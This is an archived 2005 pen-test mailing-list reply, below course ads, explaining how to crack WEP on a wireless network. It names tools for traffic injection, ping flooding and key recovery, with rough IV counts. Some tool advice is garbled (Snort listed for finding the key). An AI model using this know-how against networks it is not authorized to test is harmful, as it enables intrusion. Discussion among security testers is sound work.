Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Pen-Test
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: Wireless Pentest Question

from [Brandon Kovacs] Network Security [Permanent Link]
Subject: Re: Wireless Pentest Question
Date: Mon, 7 Feb 2005 12:00:42 -0500 
Yes...

IP Address of gateway: Use Ettercap
Create Traffic- ICMP Ping Flood Tool
WEP Key being used: Aircrak or Snort

Hope that helps, collecting enough WEP IV's in aircrack can take some
time, you will need approx. 200k-500l; depending on the amount of
traffic is on the network, that is where the ICMP ping flood tool
comes in. Aircrack will crack the WEP key in a few seconds, if you
tell it how long the WEP key is, it will do it faster, otherwise you
will need to wait a few more seconds

-Brandon Kovacs


On Mon, 07 Feb 2005 07:06:22 -0500, Joshua Wright <jwright@hasborg.com> wrote:

Arvind,

Arvind Sood wrote:

 The problem relates to creating traffic on a wireless network in case
you dont find a lot of traffic for a good capture. Is there any way
you can create traffic on a WEP network without knowing
- the IP Address (address range) the Access Point and wireless clients
are using
- the WEP key being used (makes sense - that is why you are running a WEP 
crack)


Besides aireplay (not sure why you are getting a SEGFAULT, it worked OK
for me - maybe check the Aircrack documentation?), you could use
WEPWedgie.  This tool was written by Anton Rager a few years ago, and
allows you to inject packets into the network after determining PRGA
from the WEP challenge/response mechanism.
http://www.sf.net/projects/wepwedgie/

The current version relies on the Airjack drivers for operation, meaning
you'll have to run it on a Linux 2.4 kernel system.  I wrote a small
patch to add an option to send ICMP echo requests to the broadcast
address (since you might not know any internal addresses), which is
available at http://home.jwu.edu/jwright/code/ww-broadcasticmp.diff.

Unfortunately, Airjack has some timing issues which makes it somewhat
ineffective for injecting large quantities of packets, but this will get
you started.  While at Shmoocon (you guys rock!) I started re-writing
WEPWedgie to port it to a more reliable packet injection framework (and
code cleanup) for another project, I'll make that available when I get
it finished.

Good luck,

-Josh
--
-Joshua Wright
jwright@hasborg.com
http://home.jwu.edu/jwright/

pgpkey: http://home.jwu.edu/jwright/pgpkey.htm
fingerprint: FDA5 12FC F391 3740 E0AE BDB6 8FE2 FC0A D44B 4A73

Today I stumbled across the world's largest hotspot.  The SSID is "linksys".




-- 
-Brandon
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: router stress testing tools, Ghaith Nasrawi
Next by Date:  VoIP, Stelios Tigkas
Previous by Thread:  Re: Wireless Pentest Question, Joshua Wright
Next by Thread:  Re: Wireless Pentest Question, Berdt van der Lingen
Indexes:  [Date] [Thread] [Top] [All Lists]